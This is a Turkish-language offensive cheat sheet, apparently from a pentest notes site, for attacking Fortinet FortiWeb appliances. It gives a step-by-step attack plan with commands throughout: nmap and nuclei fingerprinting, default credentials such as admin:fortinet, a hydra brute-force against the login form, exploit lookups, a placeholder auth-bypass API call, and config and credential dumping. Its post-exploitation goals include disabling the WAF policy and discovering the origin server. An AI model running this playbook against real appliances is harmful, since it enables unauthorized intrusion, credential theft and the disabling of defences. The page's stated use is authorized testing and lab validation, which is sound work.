Skip to content

Fortinet Fortiweb

network appliance

FortiWeb WAF/appliance yönetim yüzeyi sık internete açık kalır. Sürüm fingerprint + public auth bypass/RCE zincirleri öncelikli hedeftir.

  1. Yönetim HTTPS portunu ve sürümü tespit et.

  2. Public CVE / nuclei şablonlarını sürümle eşleştir.

  3. Auth bypass veya RCE PoC uygula.

  4. Config/credential dump ve pivot kanıtı al.

Terminal window
nmap -Pn -sV -p80,443,8443,4443 TARGET
Terminal window
curl -skI https://TARGET/
Terminal window
curl -sk https://TARGET/ | rg -i 'fortiweb|fortinet'
Terminal window
nuclei -u https://TARGET -tags fortiweb,fortinet
Terminal window
curl -sk https://TARGET/login
Terminal window
curl -sk https://TARGET/api/v2.0/system/status
Terminal window
whatweb -a 3 https://TARGET
admin:admin
admin:(boş)
admin:fortinet
Terminal window
hydra -L users.txt -P rockyou.txt https-post-form://TARGET/login:username=^USER^&secretkey=^PASS^:F=error
Terminal window
searchsploit fortiweb
Terminal window
msfconsole -q -x 'search fortiweb; exit'
Terminal window
# sürüm eşleşen PoC'yi laboratuvarda doğrula — path/parametre CVE'ye göre değişir
curl -sk 'https://TARGET/api/v2.0/CMD' -H 'Authorization: Bearer BYPASS'
- WAF policy disable / bypass kendi trafiğin için
- Yönetici config export
- Arkasındaki origin IP keşfi
Terminal window
curl -sk https://TARGET/api/v2.0/system/config -H 'Cookie: SESSION'
[ ] Yönetim portu + sürüm
[ ] Nuclei/CVE eşleşmesi
[ ] Auth bypass veya geçerli login
[ ] Config/RCE kanıtı